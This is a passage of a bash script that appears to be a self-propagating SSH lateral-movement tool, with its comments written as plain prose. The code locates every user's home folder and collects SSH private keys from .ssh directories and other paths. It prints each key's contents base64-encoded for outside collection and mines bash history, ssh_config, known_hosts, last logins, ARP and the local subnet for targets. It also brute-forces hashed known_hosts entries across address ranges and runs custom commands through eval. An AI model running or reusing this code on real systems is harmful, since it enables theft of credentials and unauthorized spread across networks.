Otherwise, add the current destination to the ignore list (even though it has not been scanned yet, but to avoid further destinations scanned from this one going in a circle).

If ignore_user is set, we check whether the current host (not destination) alone has been scanned.

Also fill the ignore_list_array array with a list of all the demangled dests from ignore_list.

check_for_recursion() {
[[ $ignore_user -eq 1 ]] && [[ “$ignore_list” == “@$current_hostnames_ip$ignore_separator” ]] && fin

[[ “$ignore_list” == “$ignore_separator$user@$current_hostnames_ip$ignore_separator” ]] && fin

ignore_list+="$ignore_separator$user@$current_hostnames_ip$ignore_separator"

load_ignore_list_array

In general, if a destination has more than one ip address, the script doesn’t really care about the individual addresses for the sake of checking for recursion.

However, individual addresses are useful for discovery of dests (from ignore_list_array for example from find_from_ignore_list).

Therefore, if $user@$this_host is not present in the demangled list of dests, add it. That is to say, if we’ve connected to this destination by user@this_host, and this_host is somehow not present on this server, add it.

This will also be printed when we fin(), via $current_hosts_ip.

XXX: Is this smart to do? Probably not: disabled until further notice.

[[ -v ignore_list_array[“$user@$this_host”] || ${#ignore_list_array[“$user@$this_host”]} -gt 0 ]] && return

current_hosts_ip="$this_host"

ignore_list+="$ignore_separator$user@$this_host$ignore_separator"

ignore_list_array[“$user@$this_host”]=1

}

Sets up and initializes internal variables and options.

setup() {
check_startup

check_sudo
check_sshkeygen
check_ssh_options

init_current_ips
init_chains

init_indent

Print the normal hosts_chain.

chained_print “”

Print the hostnames_chain.

printf “%s%s\n” “$indent” “$hostnames_chain”

init_ignored # We deal with any ignores users, hosts, and dests after printing the destination information because we want to know how we got here, but we don’t want to scan.

check_for_recursion # We check for recursion after printing where we are because we only want to avoid scanning the destination if it’s already been fully scanned. We still want to list how we got here.
}

If we’re using use_retry_all_dests, we don’t want to scan for any users/hosts/dests on any dests that we have already scanned, we just want to find keys on those destinations.

Therefore, if using use_retry_all_dests, no-op the addition of hosts/dests/users.

Then, manually add all interesting_dests values into ssh_dests.

Since interesting_dests is filled with the demangled destinations (effectively a demangled ignore_list), we check whether each of this destination’s $user@$ip is in interesting_dests.

If all of this destination’s $user@$ips are in interesting_dests, we assume we are ‘revisiting’ this server, so do not perform scanning for users/hosts/dests.

retry_all_dests() {
local current_ip
local ssh_dest

[[ $use_retry_all_dests -eq 2 ]] || return

for current_ip in "${!current_ips[@]}"; do
if [[ " ${interesting_dests[*]} " != " $user@$current_ip " ]]; then # TODO: remove this loop? turn it into exit?
return # XXX: Should we report that this is a NEW destination?
fi
done

no-op

add_ssh_dest() { :; }
add_ssh_host() { :; }
add_ssh_user() { :; }

for ssh_dest in "${interesting_dests[@]}"; do
is_ssh_dest “$ssh_dest” && ssh_dests[“$ssh_dest”]=1
done
}

Execute any custom commands, and print any output.

XXX: If you want this to execute after the destination has been scanned, move the exec_cusom_cmds call to fin().

exec_custom_cmds() {
local cmd

for cmd in "${custom_cmds[@]}"; do
local output
output="$(eval “$cmd” 2>&1| base64 | tr -d ‘\n’)"
chained_print “: EXTERNAL_MSG: CMD[$cmd]: $output”
done
}

Creates a list of home folders using both getent passwd(/etc/passwd) and listing the directories in /home/.

/home/ may contain deleted users’ data still, therefore /etc/passwd is not completely reliable.

find_home_folders() {
local home_folder

while IFS= read -r home_folder; do
[[ -v 'home_folders[“$home_folder”]' || ${#home_folders[“$home_folder”]} -gt 0 ]] && continue
home_folder="$(readlink -m – “$home_folder”)"
is_dir “$home_folder” && home_folders[“$home_folder”]=1
done < <(${s} find -L “/home/” -mindepth 1 -maxdepth 1 -type d 2>/dev/null)

while IFS=: read -r _ _ _ _ _ home_folder _; do
[[ -v 'home_folders[“$home_folder”]' || ${#home_folders[“$home_folder”]} -gt 0 ]] && continue
home_folder="$(readlink -m – “$home_folder”)"
is_dir “$home_folder” && home_folders[“$home_folder”]=1
done < <(getent passwd)
}

Discovers all files in the .ssh/ directories of all home folders.

init_ssh_files() {
local home_folder

for home_folder in "${!home_folders[@]}"; do
local ssh_folder
local ssh_file

ssh_folder="$home_folder/.ssh"  
is_dir "$ssh_folder" || continue

while IFS= read -r ssh_file; do  
  is_file "$ssh_file" || continue  
  ssh_files["$ssh_file"]=1  
done < <(${s} find -L "$ssh_folder" -type f -readable 2>/dev/null)  

done
}

Check whether a file is an SSH private key.

check_file_for_privkey() {
local known_key_headers
local key_file
local key_header
local file_header

key_file="$1"
known_key_headers=(
“SSH PRIVATE KEY FILE FORMAT 1.1”
"-----BEGIN RSA PRIVATE KEY-----"
"-----BEGIN DSA PRIVATE KEY-----"
"-----BEGIN EC PRIVATE KEY-----"
"-----BEGIN OPENSSH PRIVATE KEY-----"
"-----BEGIN PRIVATE KEY-----"
"-----BEGIN ENCRYPTED PRIVATE KEY-----"
"---- BEGIN SSH2 ENCRYPTED PRIVATE KEY ----"
)

is_file “$key_file” || return 1

read -r -n 50 file_header < <(${s} cat – “$key_file”) # cat is faster than head.
for key_header in "${known_key_headers[@]}"; do
if [[ “$file_header” == “$key_header” ]]; then
return 0
fi
done

return 1
}

Given the location of a potential ssh private key, determine whether we can use the private key for ssh. If so, populate the priv_keys array which contains keys that we will ssh with.

First we attempt to generate a public key for the file using ssh-keygen -yf with an invalid password. If the private key does not have a password, the invalid password does not affect the public-key generation. If the private key does have a passphrase, an error occurs.

On old ssh-keygen versions, using ssh-keygen -yf on files with too-permissive permissions (regardless of (whether it has a passphrase or not) forces a prompt. By specifying a passphase, this prompt is avoided.

Therefore, if ssh-keygen -yf fails, we are dealing with any of: 1) a file which is not a private key, 2) a file with invalid permissions, or 3) a private key with a passphrase (or a combination thereof).

If ssh-keygen -yf’s stderr includes "invalid format", the file is not a private key.

If ssh-keygen -yf succeeds, we are dealing with a file which is an unprotected private key file.

There are quite a lot of different failure cases which may be considered, such as (possibly not exhaustive):

Permission issues on [keyfile], missing [keyfile].pub files (for old versions of ssh-keygen), missing [keyfile].pub files for PEM formatted keys, all protected keys with missing [keyfile].pub (for old ssh-keygen), permission issues on [keyfile] while missing [keyfile].pub and using an extremely old version of ssh-keygen.

[keyfile] could also not be a valid key at all.

It’s all a big mess, which is probably impossible to solve with ssh-keygen itself.

Therefore, we don’t mess around with it and simply use the pubkey as the key for the array of private keys, and the value is the location of the key.

Also print the key’s contents.

populate_keys() {
local ssh_pubkey
local ssh_pubkey_ret
local key_file

key_file="$1"

ssh-keygen -yf attempts to calculate the public key from the private key.

Even if there is no passphrase, use -P because old versions of ssh-keygen start an interactive prompt if there are permission errors.

ssh_pubkey="$(${s} ssh-keygen -P NOT_VALID4SURE -yf “$key_file” 2>&1)"
ssh_pubkey_ret=$?

Ignore the file if it isn’t found (race condition?)

On new versions of ssh-keygen, an error is produced if the file is not a private key file.

if [[ “$ssh_pubkey” == “invalid format” || “$ssh_pubkey” == “No such file or directory” ]]; then
return 1
fi

if [[ $ssh_pubkey_ret -eq 0 ]]; then
chained_print “: Discovered usable private key in [$key_file]"
priv_keys[“$ssh_pubkey”]="$key_file”
else
chained_print ": Discovered unusable private key in [$key_file]"

fi
chained_print ": EXTERNAL_MSG: KEY[$key_file]: $(${s} cat – “$key_file” | base64 | tr -d ‘\n’)"
return 0
}

Checks whether a file is a key, and if so, attempts to populate the priv_keys array with the location.

Drops any files which are either user-set to be ignored or ignored for other reasons (such as already searched).

In all cases, populate the location of files in key_files arrays, so we don’t perform this function twice on the same file.

check_and_populate_keys() {
local unresolved_key_file
local key_file
local ignored_key_file

unresolved_key_file="$1"

Avoid the readlink call if the path is already absolute.

[[ -v 'priv_keys_files[“$unresolved_key_file”]' || ${#priv_keys_files[“$unresolved_key_file”]} -gt 0 ]] && return 0
[[ -v 'key_files[“$unresolved_key_file”]' || ${#key_files[“$unresolved_key_file”]} -gt 0 ]] && return 1

key_file="$(${s} readlink -m – “$unresolved_key_file”)"

[[ -v 'priv_keys_files[“$key_file”]' || ${#priv_keys_files[“$key_file”]} -gt 0 ]] && priv_keys_files[“$unresolved_key_file”]=1 && return 0
[[ -v 'key_files[“$key_file”]' || ${#key_files[“$key_file”]} -gt 0 ]] && key_files[“$unresolved_key_file”]=1 && return 1

key_files[“$unresolved_key_file”]=1
key_files[“$key_file”]=1

for ignored_key_file in "${ignored_key_files[@]}"; do
[[ “$key_file” == $ignored_key_file ]] && return 1
done

if check_file_for_privkey "$key_file"; then
populate_keys “$key_file” && priv_keys_files[“$key_file”]=1 && priv_keys_files[“$unresolved_key_file”]=1 && return 0
fi

return 1
}

Attempts to discover any ssh private keys in the home folder .ssh/ files which have previously been discovered.

find_ssh_keys() {
local ssh_file

for ssh_file in "${!ssh_files[@]}"; do
check_and_populate_keys “$ssh_file”
done
}

Attempts to discover any ssh private keys in the user set $scan_paths paths.

find_ssh_keys_paths() {
local ssh_file

while IFS= read -r ssh_file; do
check_and_populate_keys “$ssh_file”
done < <(${s} find -L ${scan_paths[@]} -maxdepth “$scan_paths_depth” -type f -size +200c -size -14000c -readable -exec grep -l -m 1 -E ‘^----[-| ]BEGIN .{0,15}PRIVATE KEY’ {} + 2>/dev/null) # Longest key is ---- BEGIN SSH2 ENCRYPTED PRIVATE KEY ----. We lose “SSH PRIVATE KEY FILE FORMAT 1.1” but oh well.
}

Given a key file path and a home directory, determine whether the key exists and corresponds to a private key or not using the appropriate home directory location where necessary.

This converts ~/ and relative paths to their appropriate locations based on the home_folder location.

check_potential_key_files() {
local key_file
local home_folder
local potential_key_file

key_file="$1"
home_folder="$2"

for potential_key_file in “$key_file” “$home_folder/${key_file:1}” "$home_folder/$key_file"; do
check_and_populate_keys “$potential_key_file” && return 0
done

return 1
}

Attempts to find users, hosts, destinations, and private keys from bash history files.

Due to the multitude of arguments that ssh may take, we parse each bash_history file and then tokenize the line.

In reality, we look for any calls to ssh, scp, and rsync, and parse the tokens appropriately. This is extremely difficult as we’re emulating execve’s job with unreliable, arbitrary data.

In all cases, we attempt to parse the standard user@host.

In the case of scp and ssh:

We discover private keys by matching the "-i" flag in the form of "-i file" or "-ifile".

The -i flag is used in various ways: -i /home/user/.ssh/id_rsa, -i ~/.ssh/id_rsa, or -i .ssh/id_rsa.

In the first case, we can simply check whether the key exists and is a key, and populate our list of keys: check_and_populate_keys /home/user/.ssh/id_rsa.

In the second case, we replace the ~ character with the home directory for which we are parsing the bash_history file: check_and_populate_keys $home_directory/.ssh/id_rsa.

In the last case, we prepend the home directory for which we are parsing the bash_history file: check_and_populate_keys $home_directory/.ssh/id_rsa.

In the case of ssh:

The -l flag can be used to specify the username of the remote destination. For example, ssh host -l root, or ssh host -lroot.

We parse both cases, and add them to ssh_users. For the life-time of the bash history LINE, we also save the username.

In the case of both scp and ssh, we are generally parsing lines which may or may not include usernames, hosts, destinations, keys, arguments, and commands to run on the remote server.

This complicates things slightly, as the following:

ssh -v -i .ssh/id_rsa -l user host ‘ps auxf’

needs to be parsed very carefully.

We also need to ensure we don’t parse too much of the line to include commands that are passed to the ssh session (e.g. ssh -luser host ‘ps’)

Therefore, for each line that is parsed, we also cache the username and host that is parsed (if possible). If a username and host are parsed, we stop processing the line (unless the -i flag is detected but the key has not been retrieved yet).

If no username is parsed for the whole line, we guess the username is that of the user whose home directory we are looking at.

find_from_bash_history() {
local home_folder

for home_folder in "${!home_folders[@]}"; do
local home_file
local bash_history_line
local home_user

home_file="$home_folder/.bash_history"  
is_file "$home_file" || continue

home_user="$(basename -- "$home_folder")"

while IFS= read -r bash_history_line; do  
  local ssh_dest  
  local tokens  
  local i  
  local cached_ssh_user  
  local cached_ssh_host  
  local cached_ssh_key

  cached_ssh_user=""  
  cached_ssh_host=""  
  cached_ssh_key=""

  # ssh user@host ; extract user@host  
  # scp file user@host:~/ ; extract user@host  
  # scp user@host:~/file ./ ; extract user@host  
  # rsync -a * user@host:~/ ; extract user@host  
  if ssh_dest="$(echo "$bash_history_line" | grep -m 1 -oE "$allowed_users_chars"'@[^ :]+')"; then #TODO: doesn't work when matches multiple (-3).  
    local ssh_host  
    local ssh_user

    ssh_host="${ssh_dest#*@}"  
    ssh_user="${ssh_dest%%@*}"

    add_ssh_dest "$ssh_dest" && cached_ssh_user="$ssh_user" && cached_ssh_host="$ssh_host"

  # scp file host:~/ ; extract host  
  # scp host:~/file ./ ; extract host  
  elif [[ "$bash_history_line" == "scp "* ]]; then  
    local ssh_host

    ssh_host="$(echo "$bash_history_line" | grep -m 1 -o -E '[^ ]+:')"  
    ssh_host="${ssh_host%:}"

    add_ssh_dest "$home_user@$ssh_host" && cached_ssh_user="$home_user" && cached_ssh_host="$ssh_host"  
  fi

  [[ "$bash_history_line" == "rsync "* ]] && continue

  read -ra tokens < <(printf "%s" "$bash_history_line")  
  for ((i=0; i<${#tokens[@]}; i++)); do  
    local token

    # Break if we've already determined a host and username, and there is no more information to gather.  
    [[ -n "$cached_ssh_user" && -n "$cached_ssh_host" ]] && [[ "$bash_history_line" != *" -i"* || -n "$cached_ssh_key" ]] && break  
    [[ -n "$cached_ssh_host" && -z "$cached_ssh_user" && "$bash_history_line" != *" -l"* ]] && [[ "$bash_history_line" != *" -i"* || -n "$cached_ssh_key" ]] && break

    token="${tokens[$i]}"

    [[ "$token" == "ssh" ]] && continue  
    [[ "$token" == "scp" ]] && continue

    # ssh -i.ssh/id_rsa host ; extract .ssh/id_rsa  
    # ssh -i .ssh/id_rsa host ; extract .ssh/id_rsa  
    if [[ "$token" == "-i"* ]]; then  
      local key_file

      if [[ ${#token} -gt 2 ]]; then  
        key_file="${token:2}"  
      elif [[ $((i+1)) -lt ${#tokens[@]} ]]; then  
        key_file="${tokens[$i+1]}"  
      else  
        continue  
      fi  
      # Depending on the line, it could be an absolute path, ~/ expansion, or relative like .ssh/id_rsa.  
      check_potential_key_files "$key_file" "$home_folder" && cached_ssh_key="$key_file"  
    # ssh -luser host ; extract user  
    # ssh -l user host ; extract user  
    elif [[ "$token" == "-l"* ]]; then  
      local ssh_user

      if [[ ${#token} -gt 2 ]]; then  
        ssh_user="${token:2}"  
      elif [[ $((i+1)) -lt ${#tokens[@]} ]]; then  
        ssh_host="${tokens[$i+1]}"  
      else  
        continue  
      fi  
      [[ -z "$cached_ssh_user" ]] && add_ssh_user "$ssh_user" && cached_ssh_user="$ssh_user"  
    else  
      [[ "$token" == "-"* ]] && continue  
      # Should always be true since we continue on token = [ssh|scp|rsync]  
      [[ $i -gt 0 ]] || continue  
      local prev_token  
      local prev_prev_token

      # match on the PREVIOUS token.  
      prev_token="${tokens[$i-1]}"  
      [[ $i -gt 1 ]] && prev_prev_token="${tokens[$i-2]}"  
      [[ "$bash_history_line" == "ssh "* ]] || continue  
      if [[ "$prev_token" == "-"* ]]; then  
        # ssh -v host ; extract host  
        # ssh -p22 host ; extract host  
        # ssh -vv host ; extract host  
        # ssh -oOption=yes host ; extract host  
        # ssh -i file host -luser ps ; do NOT extract 'ps' (cached_ssh_host already set)  
        # ssh host -v 'bash -c ls' ; do NOT extract 'bash (cached_ssh_host already set).  
        if [[ "$prev_token" =~ ^-[46AaCfGgKkMNnqsTtVvXxYy]*$ || ${#prev_token} -gt 2 ]]; then  
          local ssh_host

          ssh_host="$token"  
          [[ -z "$cached_ssh_host" ]] && add_ssh_host "$ssh_host" && cached_ssh_host="$ssh_host"  
        fi  
      # ssh host ; extract host.  
      # ssh -v host ; do NOT extract -v.  
      elif [[ "$prev_token" == "ssh" ]]; then  
        local ssh_host  
        local ssh_user

        ssh_host="$token"  
        [[ -z "$cached_ssh_host" ]] && add_ssh_host "$ssh_host" && cached_ssh_host="$ssh_host"  
      # ssh -i key host ; extract host  
      # ssh -vv -o Option=yes host ; extract host  
      # ssh -v host 'ps' ; do NOT extract anything. (especially 'ps')  
      # ssh -v -p22 host 'ps' ; do NOT extract anything (especially 'ps')  
      # ssh -D 9000 localhost -luser ; extract host  
      # ssh -i file -v -luser host ps ; do NOT extract 'ps' (cached_ssh_host already set)  
      elif [[ $i -gt 1 && "$prev_prev_token" == "-"* ]] && [[ ! "$prev_prev_token" =~ ^-[46AaCfGgKkMNnqsTtVvXxYy]*$ && ! ${#prev_prev_token} -gt 2 ]]; then  
        local ssh_host

        ssh_host="$token"  
        [[ -z "$cached_ssh_host" ]] && add_ssh_host "$ssh_host" && cached_ssh_host="$ssh_host"  
      # ssh -l user host ps ; break on ps.  
      # ssh host command ; break on command.  
      # ssh -i /file/ -l user host cmd ; break on cmd.  
      elif [[ $i -gt 1 && "${prev_prev_token:0:1}" != "-" && "${prev_token:0:1}" != "-" ]]; then  
        break  
      else  
        # Shouldn't be necessary, but can get rid of trailing commands, complicated cases (sigh).  
        break  
      fi  
    fi  
  done  
  [[ -z "$cached_ssh_user" ]] && add_ssh_user "$home_user" && cached_ssh_user="$home_user" # XXX: Can we parse ssh_config and detect Host [host] corresponds to a user, instead?

  [[ -n "$cached_ssh_user" && -n "$cached_ssh_host" ]] && add_ssh_dest "$cached_ssh_user@$cached_ssh_host"  
done < <(${s} grep -E '^(ssh|scp|rsync) ' -- "$home_file" | sort -u)  

done
}

Attempt to find usernames, hosts, and key files from ssh_config files.

An example of an ssh_config file:

Host example.com

Hostname example.com

User your_username

IdentityFile ~/.ssh/id_rsa

We parse both Host and Hostname (since Hostname is optional).

We also deal with IdentityFile when it begins with a ~ or a relative path.

Unfortunately, we don’t create ssh_dests based on the results because we parse the file line-by-line. We could probably make this work properly if we reset the variable when there’s an empty line.

find_from_ssh_config() {
local home_folder

for home_folder in "${!home_folders[@]}"; do
local ssh_file
local home_user

is_dir "$home_folder/.ssh" || continue

home_user="$(basename -- "$home_folder")"

while IFS= read -r ssh_file; do  
  is_file "$ssh_file" || continue

  local cline

  while IFS= read -r cline; do  
    local cline_val  
    local cline_key

    cline_val="$(echo "$cline" | awk '{print $NF}')" # Might be tab or space  
    cline_key="$(echo "$cline" | awk '{print $1}')" # Might be tab or space  
    cline_key="${cline_key,,}"

    [[ -z "$cline_val" ]] && continue  
    [[ -z "$cline_key" ]] && continue

    case "$cline_key" in  
      "host")  
        add_ssh_host "$cline_val"  
        [[ -n "$home_user" ]] && add_ssh_dest "$home_user@$cline_val"  
        ;;  
      "hostname")  
        add_ssh_host "$cline_val"  
        [[ -n "$home_user" ]] && add_ssh_dest "$home_user@$cline_val"  
        ;;  
      "user")  
        add_ssh_user "$cline_val"  
        ;;  
      "identityfile")  
        check_potential_key_files "$cline_val" "$home_folder"  
        ;;  
    esac  
  done < <(${s} grep -iE 'Host|HostName|User|IdentityFile' -- "$ssh_file" | sort -u)  
done < <(${s} find -L "$home_folder/.ssh" -type f -readable 2>/dev/null)  

done
}

A small hacky way to retrieve the username which corresponds to a file in a home directory.

find_user_from_file() {
local home_folder

for home_folder in "${!home_folders[@]}"; do
if [[ “$1” == "$home_folder"* ]]; then
basename – “$home_folder”
return
fi
done
}

authorized_keys may contain restrictions such as from="host,host2". Extract that host.

If the file comes from a home directory, also extract the username and turn it into a destination.

find_from_authorized_keys() {
local ssh_file

for ssh_file in "${!ssh_files[@]}"; do
local ssh_address
local home_user

[[ -z "$ssh_file" ]] && continue

home_user="$(find_user_from_file "$ssh_file")"

while IFS= read -r ssh_address; do  
  local ssh_host

  [[ -z "$ssh_address" ]] && continue  
  while IFS= read -r ssh_host; do  
    add_ssh_host "$ssh_host"  
    [[ -n "$home_user" ]] && add_ssh_dest "$home_user@$ssh_host"  
  done < <(echo "$ssh_address" | awk -F"\\\'|\\\"" '{print $2}' | tr ',' '\n' | sort -u)  
done < <(${s} grep -F 'from=' -- "$ssh_file" | awk -F"\\\'|\\\"" '{print $2}' | tr ',' '\n' | sort -u)  

done
}

Find any hosts that have previously ssh’d into this dest. Guess that the username they’re sshing to here is the same as where they’re coming from (naively).

find_from_last() {
local ssh_dest

command -v “last” >/dev/null 2>&1 || return
last -aiw >/dev/null 2>&1 || return

while IFS= read -r ssh_dest; do
add_ssh_dest “$ssh_dest”
done < <(last -aiw 2>/dev/null | grep -v reboot | awk ‘/./ {print $1":"$NF}’ | sort -u)

}

known_hosts contains a list of hosts that have previously been connected to.

On some systems, the host values are not hashed, and we can extract them.

An example looks like:

2048 MD5:32:41:b4:e7:3e:d7:ee:a4:3a:c3:a8:44:40:45:16:04 192.168.1.1 (RSA)

Incidentally, this will also scan authorized_keys files, which may look like this:

2048 MD5:62:38:9a:f0:6d:e7:57:57:25:09:71:4d:c7:bb:4b:b0 root@server (RSA)

Thus we can also add root@server to our list of destinations.

find_from_known_hosts() {
local ssh_file

for ssh_file in "${!ssh_files[@]}"; do
local known_host_line
local home_user

home_user="$(find_user_from_file "$ssh_file")"

while IFS= read -r known_host_line; do  
  local ssh_host  
  local ssh_user  
  local ssh_dest

  [[ -z "$known_host_line" ]] && continue

  ssh_user="$(echo "$known_host_line" | grep -F -m 1 '@' | awk -F"@" '{print $1}')"  
  ssh_host="$(echo "$known_host_line" | grep -F -m 1 -v '@')"  
  ssh_dest="$(echo "$known_host_line" | grep -m 1 -oE "$allowed_users_chars"'@[^ :]+')"

  add_ssh_user "$ssh_user"  
  add_ssh_host "$ssh_host"  
  add_ssh_dest "$ssh_dest"

  [[ -n "$home_user" && -n "$ssh_host" ]] && add_ssh_dest "$home_user@$ssh_host"  
done < <(${s} "${sshkeygen[@]}" "$ssh_file" 2>/dev/null | grep -F -v '|1|' | tr '[:upper:]' '[:lower:]' | grep -oE ':[a-z0-9]{2} .*' | awk '{print $2}' | sort -u)  

done
}

/etc/hosts and other static hosts may be interesting.

find_from_hosts() {
local ssh_host

while IFS= read -r ssh_host; do
add_ssh_host “$ssh_host”
done < <(getent ahostsv4 2>/dev/null | awk -F" " ‘{print $NF}’ | tr ' ' ‘\n’ | sort -u) # skip ipv6 for now
}

Neighbouring hosts that announce themselves via ARP may be interesting.

find_arp_neighbours() {
local ssh_host

while IFS= read -r ssh_host; do
add_ssh_host “$ssh_host”
done < <(ip neigh 2>/dev/null | awk ‘$1 !~ /(.1$|:)/ {print $1}’ | sort -u) # ignore ipv6 and ignore gateway
}

Neighbouring d-block hosts (x.x.x.0-x.x.x.255) may be interesting.

find_d_block() {
local octets
local i
local current_ip

for current_ip in "${!current_ips[@]}"; do
IFS=’.’ read -ra octets < <(echo “$current_ip”)

# Might be an unknown ip address.  
[[ ${#octets[@]} -eq 4 ]] || continue

for ((i=0; i<256; i++)); do  
  add_ssh_host "${octets[0]}.${octets[1]}.${octets[2]}.$i"  
done  

done
}

It may be interesting to attempt to SSH back to the same destination that we initially connected from.

We determine where we came from using the chain and parsing the second-last entry (the last one being THIS host).

We also add $SSH_CONNECTIONS and $this_dest, which if it differs, mean we’re being forwarded somewhere else (so, check all).

find_from_prev_dest() {
local chain_sl_dest
local ssh_user
local ssh_host

chain_sl_dest="${hosts_chain%[}"
chain_sl_dest="${chain_sl_dest##
->}"

add_ssh_dest “$chain_sl_dest”

add_ssh_dest “$this_dest”

[[ -z “$SSH_CONNECTION” ]] && return

ssh_host="${SSH_CONNECTION%% *}"
add_ssh_host “$ssh_host”
}

Read the ignore list and load destinations from the ignore list (aka which have already been connected to from some other host) into ssh_dests.

find_from_ignore_list() {
local ssh_dest

for ssh_dest in "${!ignore_list_array[@]}"; do
add_ssh_dest “$ssh_dest”
done
}

By default, most Debian-based OS’ use ssh_config’s HashKnownHosts, which hashes the hosts that are SSH’d to.

For example, using ssh 192.168.1.1, known_hosts will list |1|+iwCSCtqbUdZJgeteQqYgQ0hWG8=|a3AyqEIKC7R4uDQsAv8zI1yIGpU= as the hostname.

We can attempt to crack these hashes by using ssh-keygen -F, which provided a host, will print if it is in the known_hosts file.

Since we need to actually know the hosts in order to test them, we can try brute-forcing c and d-blocks of the local ip address.

For example, if we are 10.5.3.2, we can search for 10.5.0.0-10.5.255.255.

We also add the $user@$host to destinations, where $user is the home folder corresponding to where the known_hosts file was found.

If xargs is not available, we fall back to manually checking the range in a double for loop.

This is EXTREMELY slow, and even slower when using sudo. Here are some benchmarks:

xargs: 2m42.820s

for-loop: 7m52.145s

sudo xargs: 3m56.659s

sudo for-loop: 15m36.738s

Therefore, this should be used only in extreme cases.

find_from_hashed_known_hosts() {
local octets
local ssh_file
local current_ip

for ssh_file in "${!ssh_files[@]}"; do
local hashed_number
local home_user
local ssh_host
local i
local j
local ss

[[ -z "$ssh_file" ]] && continue

ss=""  
# Don't use sudo unless we have to.  
[[ ! -r "$ssh_file" ]] && ss="$s"

home_user="$(find_user_from_file "$ssh_file")"

# Determine how many (if any) hashed known hosts are in the file.  
hashed_number="$(${ss} "${sshkeygen[@]}" "$ssh_file" 2>/dev/null | grep -Ec ':[a-zA-Z0-9]{2} \|1\|')"

# break if there are no hashed known hosts left  
[[ $hashed_number -lt 1 ]] && continue

# Check all of the current ssh_hosts against all of the hashed known hosts.  
# ssh_hosts includes all ssh_dests already, so no need to parse ssh_dests.  
for ssh_host in "${!ssh_hosts[@]}"; do  
  local found_hosts_count

  found_hosts_count=0

  # break if there are no hashed known hosts left.  
  [[ $hashed_number -lt 1 ]] && break

  found_hosts_count="$(${ss} "${sshkeygen[@]}" "$ssh_file" -F "$ssh_host" 2>/dev/null | grep -cE 'Host .* found')" && ((hashed_number -= found_hosts_count)) && [[ -n "$home_user" ]] && add_ssh_dest "$home_user@$ssh_host"  
done

# break if there are no hashed known hosts left.  
[[ $hashed_number -lt 1 ]] && continue

# Check all of the ignore_list hosts against all of the hashed known hosts.  
for ssh_dest in "${!ignore_list_array[@]}"; do  
  local found_hosts_count

  found_hosts_count=0

  # break if there are no hashed known hosts left.

  [[ $hashed_number -lt 1 ]] && break

  ssh_host="${ssh_dest#*@}"  
  found_hosts_count="$(${ss} "${sshkeygen[@]}" "$ssh_file" -F "$ssh_host" 2>/dev/null | grep -cE 'Host .* found')" && ((hashed_number -= found_hosts_count)) && [[ -n "$home_user" ]] && add_ssh_dest "$home_user@$ssh_host"  
done

# break if there are no hashed known hosts left.  
[[ $hashed_number -lt 1 ]] && continue

# Finally, start brute forcing.

# use xargs if possible  
for current_ip in "${!current_ips[@]}"; do  
  # break if there are no hashed known hosts left.  
  [[ $hashed_number -lt 1 ]] && break

  IFS='.' read -ra octets < <(echo "$current_ip")  
  [[ ${#octets[@]} -eq 4 ]] || continue

  if command -v "xargs" >/dev/null 2>&1; then  
    for i in {0..255}; do  
      # break if there are no hashed known hosts left.  
      [[ $hashed_number -lt 1 ]] && break  
      while IFS= read -r ssh_host; do  
        ssh_host="${ssh_host#*Host }"  
        ssh_host="${ssh_host%% found*}"  
        add_ssh_host "$ssh_host"  
        ((hashed_number--))  
        [[ -n "$home_user" ]] && add_ssh_dest "$home_user@$ssh_host"  
      done < <(  
        for j in {0..255}; do  
          echo "${octets[0]}.${octets[1]}.$j.$i"  
        done | xargs -P 0 -n 1 ${ss} ssh-keygen -f "$ssh_file" -F 2>/dev/null | grep -F '# Host')  
    done  
  else  
    for ((i=0; i<256; i++)); do  
      # break if there are no hashed known hosts left.  
      [[ $hashed_number -lt 1 ]] && break  
      for ((j=0; j<256; j++)); do  
        local found_hosts_count

        found_hosts_count=0

        # break if there are no hashed known hosts left.  
        [[ $hashed_number -lt 1 ]] && break

        ssh_host="${octets[0]}.${octets[1]}.$i.$j"  
        [[ -v 'ssh_hosts["$ssh_host"]' || ${#ssh_hosts["$ssh_host"]} -gt 0 ]] && continue # Skip this because we have already tried it earlier.

        found_hosts_count="$(${ss} "${sshkeygen[@]}" "$ssh_file" -F "$ssh_host" 2>/dev/null | grep -cE 'Host .* found')" && ((hashed_number -= found_hosts_count)) && [[ -n "$home_user" ]] && add_ssh_dest "$home_user@$ssh_host"  
      done  
    done  
  fi  
done  

done
}

Find: home folders, SSH-related files, SSH keys, SSH users, SSH hosts, SSH dests.

find_all() {
retry_all_dests
find_home_folders
init_ssh_files

find_ssh_keys
find_ssh_keys_paths
find_from_bash_history
find_from_ssh_config

(( ${#priv_keys[@]} )) || fin

None of the following strategies discover keys.

find_from_authorized_keys
find_from_last
find_from_known_hosts
find_from_hosts
find_arp_neighbours
find_d_block
find_from_prev_dest
find_from_ignore_list

find_from_hashed_known_hosts # Should always be last as it relies on ssh_hosts being filled.
}

If use_combinate_users_hosts_aggressive is enabled, combinate all:

ssh_hosts and interesting_hosts

ssh_users and interesting_users

Then, join all ssh_users@ssh_hosts.

combinate_users_hosts_aggressive() {
local ssh_user
local ssh_host

for ssh_host in "${interesting_hosts[@]}"; do
add_ssh_host “$ssh_host”
done

for ssh_user in "${interesting_users[@]}"; do
add_ssh_user “$ssh_user”
done

for ssh_dest in "${interesting_dests[@]}"; do
add_ssh_dest “$ssh_dest”
done

for ssh_host in "${!ssh_hosts[@]}"; do
for ssh_user in "${!ssh_users[@]}"; do
add_ssh_dest “$ssh_user@$ssh_host”
done
done
}

Add any interesting dests, combine any interesting users with all hosts, any interesting hosts with all users, and interesting hosts with interesting users.

combinate_interesting_users_hosts() {
local ssh_user
local ssh_host

for ssh_dest in "${interesting_dests[@]}"; do
add_ssh_dest “$ssh_dest”
done

for ssh_user in "${interesting_users[@]}"; do
add_ssh_user “$ssh_user”
for ssh_host in "${!ssh_hosts[@]}"; do
add_ssh_dest “$ssh_user@$ssh_host”
done
done

for ssh_host in "${interesting_hosts[@]}"; do
add_ssh_host “$ssh_host”
for ssh_user in "${!ssh_users[@]}"; do
add_ssh_dest “$ssh_user@$ssh_host”
done
done

for ssh_host in "${interesting_hosts[@]}"; do
for ssh_user in "${interesting_users[@]}"; do
add_ssh_dest “$ssh_user@$ssh_host”
done
done
}

Deduplicate ssh_dests by resolving the hosts for each ssh_dest, checking whether the user, host, or resolved dest is ignored, then adding the destinations back to the original ssh_dests array.

deduplicate_resolved_hosts_keys() {
local ssh_dest
declare -A valid_ssh_dests
declare -A resolved_hosts

Pre-resolve each host concurrently in the hope that the answers will be cached.

for ssh_dest in "${!ssh_dests[@]}"; do
local ssh_host

is_ssh_dest "$ssh_dest" || continue  
ssh_host="${ssh_dest#*@}"  
